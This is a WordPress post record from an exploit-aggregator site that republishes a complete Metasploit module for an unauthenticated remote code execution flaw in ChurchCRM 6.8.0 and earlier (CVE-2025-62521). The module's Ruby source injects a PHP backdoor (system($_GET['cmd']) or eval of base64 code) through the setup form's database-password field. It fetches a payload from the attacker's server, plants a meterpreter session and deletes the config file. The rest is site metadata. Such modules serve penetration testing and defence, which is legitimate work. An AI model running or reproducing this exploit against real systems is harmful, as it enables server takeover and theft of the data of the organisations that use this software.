{"id":41070,"date":"2026-02-16T13:47:29","date_gmt":"2026-02-16T13:47:29","guid":{"rendered":"http:\/\/localhost\/?p=41070"},"modified":"2026-02-16T13:47:29","modified_gmt":"2026-02-16T13:47:29","slug":"churchcrm-unauthenticated-rce-680","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41070","title":{"rendered":"ChurchCRM Unauthenticated RCE 6.8.0_MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_INSTALL_UNAUTH_RCE-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-16T19:28:04&#8243;,&#8221;description&#8221;:&#8221;This module exploits an unauthenticated remote code execution vulnerability in the installation process of ChurchCRM versions 6.8.0 and earlier. By sending a specially crafted POST request to the &#8216;setup&#8217; page, an attacker can execute arbitrary commands&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-16T18:59:51&#8243;,&#8221;modified&#8221;:&#8221;2026-02-16T18:59:51&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;ChurchCRM Unauthenticated RCE 6.8.0&#8243;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_INSTALL_UNAUTH_RCE-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-62521&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n  Rank = NormalRanking\\n\\n  include Msf::Exploit::Remote::HttpClient\\n  include Msf::Exploit::CmdStager\\n  include Msf::Exploit::Remote::HttpServer\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;ChurchCRM Unauthenticated RCE 6.8.0&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          This module exploits an unauthenticated remote code execution\\n          vulnerability in the installation process of ChurchCRM versions\\n          6.8.0 and earlier. By sending a specially crafted POST request to\\n          the &#8216;setup&#8217; page, an attacker can execute arbitrary commands on the\\n          target server. This module uploads a meterpreter payload to the\\n          target server and executes it, allowing for remote code execution.\\n        },\\n        &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n        &#8216;Author&#8217; =\\u003e [&#8216;LucasCsmt&#8217;],\\n        &#8216;References&#8217; =\\u003e [\\n          [ &#8216;GHSA&#8217;, &#8216;m8jq-j3p9-2xf3&#8217;],\\n          [ &#8216;CVE&#8217;, &#8216;2025-62521&#8217;]\\n        ],\\n        &#8216;Platform&#8217; =\\u003e [&#8216;linux&#8217;, &#8216;php&#8217;],\\n        &#8216;Targets&#8217; =\\u003e [\\n          [\\n            &#8216;Linux\/unix Command (CmdStager)&#8217;,\\n            {\\n              &#8216;Arch&#8217; =\\u003e [ ARCH_X86, ARCH_X64 ],\\n              &#8216;Platform&#8217; =\\u003e [&#8216;linux&#8217;],\\n              &#8216;Type&#8217; =\\u003e :nix_cmdstager,\\n              &#8216;DefaultOptions&#8217; =\\u003e {\\n                &#8216;InitialAutoRunScript&#8217; =\\u003e &#8216;post\/multi\/general\/execute COMMAND=\\&#8221;rm Include\/Config.php\\&#8221;&#8216;\\n              },\\n              &#8216;CmdStagerFlavor&#8217; =\\u003e [\\n                &#8216;printf&#8217;, &#8216;echo&#8217;, &#8216;bourne&#8217;, &#8216;fetch&#8217;, &#8216;curl&#8217;, &#8216;wget&#8217;\\n              ]\\n            }\\n          ],\\n          [\\n            &#8216;PHP (In-Memory)&#8217;,\\n            {\\n              &#8216;Arch&#8217; =\\u003e [ ARCH_PHP ],\\n              &#8216;Platform&#8217; =\\u003e [&#8216;php&#8217;],\\n              &#8216;Type&#8217; =\\u003e :php_memory,\\n              &#8216;DefaultOptions&#8217; =\\u003e {\\n                &#8216;InitialAutoRunScript&#8217; =\\u003e &#8216;post\/multi\/general\/execute COMMAND=\\&#8221;php -r \\\\\\&#8221;unlink(\\\\&#8217;Include\/Config.php\\\\&#8217;);\\\\\\&#8221;\\&#8221;&#8216;\\n              }\\n            }\\n          ],\\n          [\\n            &#8216;PHP (fetch)&#8217;,\\n            {\\n              &#8216;Arch&#8217; =\\u003e [ ARCH_PHP ],\\n              &#8216;Platform&#8217; =\\u003e [&#8216;php&#8217;],\\n              &#8216;Type&#8217; =\\u003e :php_fetch,\\n              &#8216;DefaultOptions&#8217; =\\u003e {\\n                &#8216;InitialAutoRunScript&#8217; =\\u003e &#8216;post\/multi\/general\/execute COMMAND=\\&#8221;php -r \\\\\\&#8221;unlink(\\\\&#8217;Include\/Config.php\\\\&#8217;);\\\\\\&#8221;\\&#8221;&#8216;\\n              }\\n            }\\n          ],\\n        ],\\n        &#8216;DisclosureDate&#8217; =\\u003e &#8216;2025-12-17&#8217;,\\n        &#8216;DefaultTarget&#8217; =\\u003e 0,\\n        &#8216;Notes&#8217; =\\u003e {\\n          &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n          &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION],\\n          &#8216;SideEffects&#8217; =\\u003e [IOC_IN_LOGS, CONFIG_CHANGES]\\n        }\\n      )\\n    )\\n\\n    register_options(\\n      [\\n        OptString.new(&#8216;TARGETURI&#8217;, [true, &#8216;Base path&#8217;, &#8216;\/&#8217;]),\\n      ]\\n    )\\n  end\\n\\n  # Check if the target is up by accessing the setup page\\n  def check\\n    print_status(&#8216;Checking if the target is reachable&#8230;&#8217;)\\n\\n    res = send_request_cgi({\\n      &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;setup&#8217;, &#8216;\/&#8217;)\\n    })\\n\\n    unless res \\u0026\\u0026 (res.code == 301 || res.code == 200 || res.code == 302)\\n      fail_with(Failure::Unreachable, &#8216;Target is not reachable&#8217;)\\n      return Exploit::CheckCode::Unknown(&#8216;Target setup page is inaccessible&#8217;)\\n    end\\n\\n    version = res.headers[&#8216;CRM-VERSION&#8217;]\\n    if version\\n      print_status(\\&#8221;Found ChurchCRM version: #{version}\\&#8221;)\\n      if Rex::Version.new(version) \\u003c= Rex::Version.new(&#8216;6.8.0&#8217;)\\n        return Exploit::CheckCode::Appears(\\&#8221;Vulnerable version #{version} detected via CRM-VERSION header.\\&#8221;)\\n      else\\n        return Exploit::CheckCode::Safe(\\&#8221;Version #{version} is not vulnerable.\\&#8221;)\\n      end\\n    end\\n\\n    return Exploit::CheckCode::Appears\\n  end\\n\\n  # Build the payload that will be into the installation form\\n  #\\n  # @return : the payload\\n  def build_payload\\n    case target[&#8216;Type&#8217;]\\n    when :php_memory\\n      b64_payload = Rex::Text.encode_base64(payload.encoded)\\n      \\&#8221;#{rand_text_alpha(3)}&#8217;; eval(base64_decode(\\\\\\&#8221;#{b64_payload}\\\\\\&#8221;)); \/\/\\&#8221;\\n    when :php_fetch\\n      start_service\\n      payload_name = &#8216;\/tmp\/&#8217; + rand_text_alpha(5..10) + &#8216;.php&#8217;\\n      \\&#8221;#{rand_text_alpha(3)}&#8217;; $f=&#8217;#{payload_name}&#8217;; file_put_contents($f, file_get_contents(&#8216;#{get_uri}&#8217;)); register_shutdown_function(&#8216;unlink&#8217;, $f); include($f); \/\/\\&#8221;\\n    else\\n      \\&#8221;#{rand_text_alpha(3)}&#8217;; system($_GET[&#8216;cmd&#8217;]); \/\/\\&#8221;\\n    end\\n  end\\n\\n  # Send a POST request to the setup page in order to execute commands\\n  def alter_config\\n    print_status(&#8216;Injecting backdoor into Include\/Config.php via setup page&#8230;&#8217;)\\n\\n    res = send_request_cgi({\\n      &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;setup&#8217;, &#8216;\/&#8217;),\\n      &#8216;vars_post&#8217; =\\u003e {\\n        &#8216;DB_SERVER_NAME&#8217; =\\u003e rand_text_alpha(5..10),\\n        &#8216;DB_SERVER_PORT&#8217; =\\u003e &#8216;3306&#8217;,\\n        &#8216;DB_NAME&#8217; =\\u003e rand_text_alpha(5..10),\\n        &#8216;DB_USER&#8217; =\\u003e rand_text_alpha(5..8),\\n        &#8216;DB_PASSWORD&#8217; =\\u003e build_payload,\\n        &#8216;ROOT_PATH&#8217; =\\u003e &#8216;\/&#8217;,\\n        &#8216;URL&#8217; =\\u003e \\&#8221;http:\/\/#{rand_text_alpha(5..10)}.com\/\\&#8221;\\n      }\\n    })\\n\\n    msg = &#8216;Failed to inject backdoor into Include\/Config.php. &#8216; \\\\\\n      &#8216;This can happen if the setup process has already been &#8216; \\\\\\n      &#8216;completed or if the target is not vulnerable.&#8217;\\n    fail_with(Failure::UnexpectedReply, msg) unless res\\u0026.code == 200\\n  end\\n\\n  # Execute command on the target server\\n  #\\n  # @param cmd [String] the command to execute\\n  def execute_command(cmd, _opts = {})\\n    send_request_cgi({\\n      &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path),\\n      &#8216;vars_get&#8217; =\\u003e { &#8216;cmd&#8217; =\\u003e cmd }\\n    })\\n  end\\n\\n  # Execute PHP code on the target server in order to run the payload\\n  def execute_php\\n    print_status(&#8216;Trying to execute the PHP payload&#8217;)\\n\\n    send_request_cgi({\\n      &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path)\\n    })\\n\\n    print_good(&#8216;PHP payload successfully executed&#8217;)\\n  end\\n\\n  # Upload the payload to the target server\\n  def execute_linux\\n    print_status(&#8216;Uploading payload to the target server&#8230;&#8217;)\\n\\n    execute_cmdstager(\\n      linemax: 500,\\n      nodelete: false,\\n      background: true,\\n      temp: &#8216;\/tmp&#8217;\\n    )\\n\\n    print_good(&#8216;Payload uploaded successfully.&#8217;)\\n  end\\n\\n  # Handles the incoming HTTP request and serves the payload to the target.\\n  def on_request_uri(cli, _request)\\n    p = payload.encoded\\n    send_response(cli, p, {\\n      &#8216;Content-Type&#8217; =\\u003e &#8216;application\/x-httpd-php&#8217;,\\n      &#8216;Pragma&#8217; =\\u003e &#8216;no-cache&#8217;\\n    })\\n  end\\n\\n  def exploit\\n    alter_config\\n\\n    case target[&#8216;Type&#8217;]\\n    when :nix_cmdstager\\n      execute_linux\\n    else\\n      execute_php\\n    end\\n  end\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/http\/churchcrm_install_unauth_rce.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:10,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/http\/churchcrm_install_unauth_rce\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-16T19:28:04&#8243;,&#8221;description&#8221;:&#8221;This module exploits an unauthenticated remote code execution vulnerability in the installation process of ChurchCRM versions 6.8.0 and earlier. By sending a specially crafted POST&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,169,13,7,11,5],"class_list":["post-41070","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>ChurchCRM Unauthenticated RCE 6.8.0_MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_INSTALL_UNAUTH_RCE- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41070\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"ChurchCRM Unauthenticated RCE 6.8.0_MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_INSTALL_UNAUTH_RCE- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-16T19:28:04&#8243;,&#8221;description&#8221;:&#8221;This module exploits an unauthenticated remote code execution vulnerability in the installation process of ChurchCRM versions 6.8.0 and earlier. By sending a specially crafted POST...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41070\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-16T13:47:29+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41070#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41070\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"ChurchCRM Unauthenticated RCE 6.8.0_MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_INSTALL_UNAUTH_RCE-\",\"datePublished\":\"2026-02-16T13:47:29+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41070\"},\"wordCount\":1178,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-10.0\",\"exploit\",\"metasploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41070#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41070\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41070\",\"name\":\"ChurchCRM Unauthenticated RCE 6.8.0_MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_INSTALL_UNAUTH_RCE- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-16T13:47:29+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41070#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41070\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41070#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"ChurchCRM Unauthenticated RCE 6.8.0_MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_INSTALL_UNAUTH_RCE-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"ChurchCRM Unauthenticated RCE 6.8.0_MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_INSTALL_UNAUTH_RCE- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41070","og_locale":"en_US","og_type":"article","og_title":"ChurchCRM Unauthenticated RCE 6.8.0_MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_INSTALL_UNAUTH_RCE- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-16T19:28:04&#8243;,&#8221;description&#8221;:&#8221;This module exploits an unauthenticated remote code execution vulnerability in the installation process of ChurchCRM versions 6.8.0 and earlier. By sending a specially crafted POST...","og_url":"https:\/\/zero.redgem.net\/?p=41070","og_site_name":"zero redgem","article_published_time":"2026-02-16T13:47:29+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41070#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41070"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"ChurchCRM Unauthenticated RCE 6.8.0_MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_INSTALL_UNAUTH_RCE-","datePublished":"2026-02-16T13:47:29+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41070"},"wordCount":1178,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-10.0","exploit","metasploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41070#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41070","url":"https:\/\/zero.redgem.net\/?p=41070","name":"ChurchCRM Unauthenticated RCE 6.8.0_MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_INSTALL_UNAUTH_RCE- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-16T13:47:29+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41070#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41070"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41070#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"ChurchCRM Unauthenticated RCE 6.8.0_MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_INSTALL_UNAUTH_RCE-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41070","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41070"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41070\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41070"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41070"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41070"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}